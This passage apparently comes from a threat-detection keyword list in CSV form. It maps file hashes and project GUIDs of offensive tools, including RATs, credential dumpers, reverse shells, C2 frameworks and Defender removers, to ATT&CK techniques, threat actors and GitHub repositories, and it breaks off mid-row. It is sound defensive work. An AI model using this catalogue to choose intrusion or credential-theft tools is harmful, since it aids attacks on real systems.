"*94b33b49ee9fd258173cdc1a31c1f330403d6dc78540bf7258e8c9b6763334f8*",".{0,1000}94b33b49ee9fd258173cdc1a31c1f330403d6dc78540bf7258e8c9b6763334f8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31337" "*94bd506457e76c837592396e349c0d2da7f783ed0d1e3f083457b4ac013286cb*",".{0,1000}94bd506457e76c837592396e349c0d2da7f783ed0d1e3f083457b4ac013286cb.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","31338" "*94bdfe850be6641545e52c3b0a3cbe2cb753145d02004ce8211b8468902d88ba*",".{0,1000}94bdfe850be6641545e52c3b0a3cbe2cb753145d02004ce8211b8468902d88ba.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31339" "*94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb*",".{0,1000}94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31340" "*94c1bf751c218c05c084d309a18c98a54385abc6b41b03b456ef0747e5abd8e9*",".{0,1000}94c1bf751c218c05c084d309a18c98a54385abc6b41b03b456ef0747e5abd8e9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31341" "*94c1e9fde90bb271016a5a6bc05f6cfc8caa1acc18336aa864de5431ac52c7a4*",".{0,1000}94c1e9fde90bb271016a5a6bc05f6cfc8caa1acc18336aa864de5431ac52c7a4.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31342" "*94c7153749f9d9e3d12da8ff2201927599003808cee82316e9bc632387aeb0cc*",".{0,1000}94c7153749f9d9e3d12da8ff2201927599003808cee82316e9bc632387aeb0cc.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31345" "*94ca09b07f92e22393a2b6afc541bdd82cb351ab6eba92cc312fde149aac0606*",".{0,1000}94ca09b07f92e22393a2b6afc541bdd82cb351ab6eba92cc312fde149aac0606.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31346" "*94cae63dcbabb71c5dd43f55fd09caeffdcd7628a02a112fb3cba36698ef72bc*",".{0,1000}94cae63dcbabb71c5dd43f55fd09caeffdcd7628a02a112fb3cba36698ef72bc.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential 
Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31348" "*94d8893a6c819e092afee3334fb7f2263704b30a1139fae76a67d52d4a4db801*",".{0,1000}94d8893a6c819e092afee3334fb7f2263704b30a1139fae76a67d52d4a4db801.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31351" "*94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3*",".{0,1000}94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","31352" "*94dd1b6c6dc713a934516955f05b43b6a7c82b008788312e6f2fe56ed12c9094*",".{0,1000}94dd1b6c6dc713a934516955f05b43b6a7c82b008788312e6f2fe56ed12c9094.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31353" "*94e25cf9677638da8ddfd84a2c15783e894de90331ed06e9786b1a46df1915fb*",".{0,1000}94e25cf9677638da8ddfd84a2c15783e894de90331ed06e9786b1a46df1915fb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - 
T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31355" "*94eada8ec8949a866792d385ca5f5b23e314c310e67035f576604d9ef9bf9a96*",".{0,1000}94eada8ec8949a866792d385ca5f5b23e314c310e67035f576604d9ef9bf9a96.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31358" "*94ebb5f2aef9398a08a40e352a09bf6f83e01c0a666e3adb017636af3e0bee12*",".{0,1000}94ebb5f2aef9398a08a40e352a09bf6f83e01c0a666e3adb017636af3e0bee12.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31359" "*94f363f8d5a0c96bd72906bf5cef04d1966ad6c1fc99c80484ad89e10b20b8db*",".{0,1000}94f363f8d5a0c96bd72906bf5cef04d1966ad6c1fc99c80484ad89e10b20b8db.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31360" "*94f93f559533afd33b026849ee730d3c360faa4e9dcf7241d3d3132802736ee0*",".{0,1000}94f93f559533afd33b026849ee730d3c360faa4e9dcf7241d3d3132802736ee0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31361" "*94fcbb0aadcaaeae36a043eee19005e3e6ae2c991a389291fef7d4ecbe68aeb5*",".{0,1000}94fcbb0aadcaaeae36a043eee19005e3e6ae2c991a389291fef7d4ecbe68aeb5.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","31362" "*950ba7173a1c869400d8b9099a42ef76c13546da5321f69da77819899b6e1d23*",".{0,1000}950ba7173a1c869400d8b9099a42ef76c13546da5321f69da77819899b6e1d23.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31367" "*950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c*",".{0,1000}950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","31368" "*950c01ef35e9f68b4d8d9d9ea2c642fc6202b44ecabc19591dd7d3f852d02bcf*",".{0,1000}950c01ef35e9f68b4d8d9d9ea2c642fc6202b44ecabc19591dd7d3f852d02bcf.{0,1000}","offensive_tool_keyword","C3","Framework designed for 
red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31369" "*950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408*",".{0,1000}950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31371" "*951575758d87951838e7afe524f008ba71c75b88738c66f7a753f05d47937017*",".{0,1000}951575758d87951838e7afe524f008ba71c75b88738c66f7a753f05d47937017.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31375" 
"*9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0*",".{0,1000}9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","31376" "*9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0*",".{0,1000}9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31377" "*9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48*",".{0,1000}9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","31378" "*952868f75bda8b0eeb8f632ae0e549d58bcd1dfe5d4bfa3d7ae385f03bfb25fe*",".{0,1000}952868f75bda8b0eeb8f632ae0e549d58bcd1dfe5d4bfa3d7ae385f03bfb25fe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31380" "*952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91*",".{0,1000}952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#filehash","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","31381" "*953e3673f6aeda854ed73b54de0c6faa1c38ea80e6b13b3ea010bb56ad79cfb6*",".{0,1000}953e3673f6aeda854ed73b54de0c6faa1c38ea80e6b13b3ea010bb56ad79cfb6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31384" "*95451ba9e548f9e140de232b85cdf6541438e20d7c58e01eeb3011b87dbcd292*",".{0,1000}95451ba9e548f9e140de232b85cdf6541438e20d7c58e01eeb3011b87dbcd292.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31385" "*9549130cf3c479190977cf265b672fcd9a6dcab81d085e01d362eac660dfdd39*",".{0,1000}9549130cf3c479190977cf265b672fcd9a6dcab81d085e01d362eac660dfdd39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31387" "*95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd*",".{0,1000}95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31388" "*954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97*",".{0,1000}954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31389" "*95502b5e-5763-4ec5-a64c-1e9e33409e2f*",".{0,1000}95502b5e\-5763\-4ec5\-a64c\-1e9e33409e2f.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#GUIDproject","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","31391" "*955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf*",".{0,1000}955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf.{0,1000}","offensive_tool_keyword","Ddexec","A 
technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","31392" "*95529189-2fb6-49e4-ab2d-3c925ada4414*",".{0,1000}95529189\-2fb6\-49e4\-ab2d\-3c925ada4414.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#GUIDproject","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","31393" "*9555ccebd8cee6d9f1d08bc5f2386c210cfd3930553e153f567a1d1d12403c29*",".{0,1000}9555ccebd8cee6d9f1d08bc5f2386c210cfd3930553e153f567a1d1d12403c29.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31394" "*95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149*",".{0,1000}95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31398" "*9566f875d51e0259d3d64d6a20250ffaffd527e17e060cde0b77dea42a10a13e*",".{0,1000}9566f875d51e0259d3d64d6a20250ffaffd527e17e060cde0b77dea42a10a13e.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","31400" "*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*",".{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","31401" "*956f0e02e10050586c0a0fedbf9da70b2204726342485f8400eb0804eaadeb6c*",".{0,1000}956f0e02e10050586c0a0fedbf9da70b2204726342485f8400eb0804eaadeb6c.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31404" "*957a85413b6979ee849ae5b802066eeab409bef45da76540a8d6f561bc0a36a0*",".{0,1000}957a85413b6979ee849ae5b802066eeab409bef45da76540a8d6f561bc0a36a0.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools 
that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31405" "*957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f*",".{0,1000}957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31407" "*958af18a7de60d885d3f792d8a0b0829aee5507cdcbbf2d23208e45c57239727*",".{0,1000}958af18a7de60d885d3f792d8a0b0829aee5507cdcbbf2d23208e45c57239727.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31408" 
"*9593cc106f75cc415faadbeb5b16fa79cfe8c047ad007d50dbf8cb1d242126de*",".{0,1000}9593cc106f75cc415faadbeb5b16fa79cfe8c047ad007d50dbf8cb1d242126de.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#filehash","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","31411" "*959818e89008c47a0f515ac6f000163c9ff6a9a0cc094d42d1a823ab3f461d22*",".{0,1000}959818e89008c47a0f515ac6f000163c9ff6a9a0cc094d42d1a823ab3f461d22.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31412" "*959e83965543c8843feb6db4e1caca99803a59c6bbcb8786a80dd25ec6fba0bc*",".{0,1000}959e83965543c8843feb6db4e1caca99803a59c6bbcb8786a80dd25ec6fba0bc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31416" "*95A40D7C-F3F7-4C45-8C5A-D384DE50B6C9*",".{0,1000}95A40D7C\-F3F7\-4C45\-8C5A\-D384DE50B6C9.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#GUIDproject","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","31417" "*95aa09723c700a9e1bb225c70c26ac6f63169089ab7ae3ecdbb9b67fb23740dd*",".{0,1000}95aa09723c700a9e1bb225c70c26ac6f63169089ab7ae3ecdbb9b67fb23740dd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 